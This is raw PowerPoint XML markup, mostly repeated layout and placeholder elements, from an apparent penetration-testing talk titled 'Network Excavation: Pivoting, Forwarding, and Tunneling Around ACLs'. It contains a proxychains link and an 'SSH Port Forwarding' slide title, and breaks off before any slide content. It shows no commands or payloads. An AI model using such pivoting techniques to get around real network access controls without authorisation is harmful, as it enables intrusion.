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8" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="269" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="272" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="273" r:id="rId11"/>
    <p:sldId id="274" r:id="rId12"/>
    <p:sldId id="276" r:id="rId13"/>
    <p:sldId id="277" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="284" r:id="rId16"/>
    <p:sldId id="285" r:id="rId17"/>
    <p:sldId id="262" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="292" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="261" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="283" r:id="rId25"/>
    <p:sldId id="282" r:id="rId26"/>
    <p:sldId id="267" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="288" r:id="rId29"/>
    <p:sldId id="289" r:id="rId30"/>
    <p:sldId id="263" r:id="rId31"/>
    <p:sldId id="270" r:id="rId32"/>
    <p:sldId id="264" r:id="rId33"/>
    <p:sldId id="265" r:id="rId34"/>
    <p:sldId id="266" r:id="rId35"/>
    <p:sldId id="281" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="290" r:id="rId38"/>
    <p:sldId id="293" r:id="rId39"/>
    <p:sldId id="295"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0" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="106" d="100"/>
          <a:sy n="106" d="100"/>
        </p:scale>
        <p:origin x="73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EC69BE-1798-41CF-8A94-234750A521B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102968E-B526-4BAA-87FB-9006149E23C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B780FEA-C4AA-4B52-8ABA-6C8A92ED7577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C2A7B5-23B9-47D8-890F-DDE5F34BF2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9D8EA0-21A8-4DFB-A57A-8969342F8AD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40931777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67BC17-AD39-404C-8B31-94B73F4C2E4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130AB6B-D5CE-4033-A08B-0EF0303D913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009042-506A-469B-8975-274E9C91984B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2BA7FC5-C2B3-4C6B-9021-02B8235FB6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6C26F3-F094-46BB-BD9B-B838E0B47F4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16497157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D486579-A05A-48E5-93AD-12FA755C518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F18C015-7C3C-43C9-AC9B-A699743DE05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7D19AD3-03D7-491A-991B-44CFD24216E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE371F8F-71BE-49A2-AD31-A3DD3474DA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ECFE5F-11A8-475A-B2E9-033244417C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9912229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D6CC3A-54AF-47D5-9E82-A7D24C30264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463D0CB-DE16-4B23-8F03-11408C05553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670B4E2-EECF-40E1-9243-99BC71E02D51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1DB6B0-8B61-4340-932B-3179388657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C32C2D-DCFB-4353-9722-FC9FD37A91C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27638767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D10EDB-C5ED-4EB6-A902-9F23D595FBF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B04EE7E-BE8B-4230-A261-AB0A41CAD82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CD91E5C-77D5-4A35-83B3-ED10073BE586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B27265-42BF-4641-8B40-C5B6F18087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CF0523-4B13-4A3E-9534-81904C07D814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31560261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A9F0A5-0779-4CE1-9365-1C77664C70A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9EBB1F2-C280-4EB8-93C6-77713781E4E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58EDE95-7996-47A5-A2C0-39F0FF54147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6557E6D-A264-4CB4-A78E-E54694847CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAF7C7B-8F99-408E-BA9D-9873E563E55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5982E67-54DC-4ADE-80C8-A99868B5659A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15522505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D93CF-FFD3-434C-9F74-0EF339F392E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63D7A0F-7EE1-4470-86B1-2AB0A7D5BB4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1D19527-D26E-4DC8-979A-33D5A9B484B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9892D18-7F86-4259-BD16-0D12C2C49AB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EB06379-B392-4850-93AF-E03ABFD3023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39A4269-6335-4927-ACDF-0BF1AB63F41B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC536971-842C-42EB-A0AE-04D74D962E7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C17D90D-D8FB-4F21-AAC5-694EB2302C1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38464843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5A9F78-0C82-4D20-80D4-BC5E511A299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61324B5-C0FA-4BC8-9AB9-AA19DC09BEBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{653B3862-422F-4C2A-B77D-0E803830EAC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438A60E-C7D7-480D-A124-B2D8816CF5C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39668572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7417BA-A65F-4C4E-8407-6511CCBEA673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72851BF1-18E8-4A9B-BB63-4CB17102EA4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C9FB71C-7FCF-4EDC-B8A0-D05E2536DF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8194037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9D9296-4490-46DA-BF61-430F293042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3D2EC8D-81E5-4290-857B-C119F08C6E3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C3B4E9F-7736-48B3-85E6-6C79448A5F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806D3D-9684-42C9-ABDB-F611E7960823}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841F60E6-19C9-4B99-B4EB-CC7FE0523B2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0437278-BEDA-4EF0-9E18-E6E20B166C99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10022158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6B35C-9798-4CBE-A5C9-A2B2F78D2EC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90FEB42-F95A-4ECE-9D21-1A48E2CD1C0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3C91492-C505-4D5D-A60D-32B54D56EF3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05E7743-BB8D-41BA-8E7D-EB3F1030F5B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{117731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC87DC41-783E-4DF0-8459-C8958E141E5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754DCB4-E13A-4326-9B67-5DEDC392EB1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3D6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1020576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BC1A8F7-3ADD-43D0-9552-59B1FEBE0D7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0B51346E-6AFD-4C48-AA3E-E5C5616469E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1D35CD6-DDC6-46A1-8A09-BD4D390747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7731BB-8EBA-4138-A7F9-2F47034B9031}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/15/2022</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53477EE4-3C0B-43CC-870F-745A10EF7CF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499A117-B776-419C-8CBE-1E5F2C9A434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6A9DD1-578A-427F-987C-7A8BA3C602A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28720470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hyperlink" Target="https://github.com/haad/proxychains" TargetMode="External"/><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EA5C3B-28B1-4A6E-8645-2A6DBC16E349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521369" y="2502568"/>
            <a:ext cx="6545179" cy="2021304"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Excavation: Pivoting, Forwarding, and Tunneling Around ACLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{106F81BB-07CA-469A-BDFD-7914A76A98A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1307432" y="4667124"/>
            <a:ext cx="5105400" cy="1228348"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cory Cavanagh OSCP, CISSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="gray concrete train tunnel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31AD0B2D-503C-415C-9015-83688AF36C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87390" y="890337"/>
            <a:ext cx="3497178" cy="52457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29288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7A5E6A-D01F-4643-81A2-8C466A518B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418682" y="0"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH Port Forwarding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D021920-DEBF-4138-99B6-1C7730B6C7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
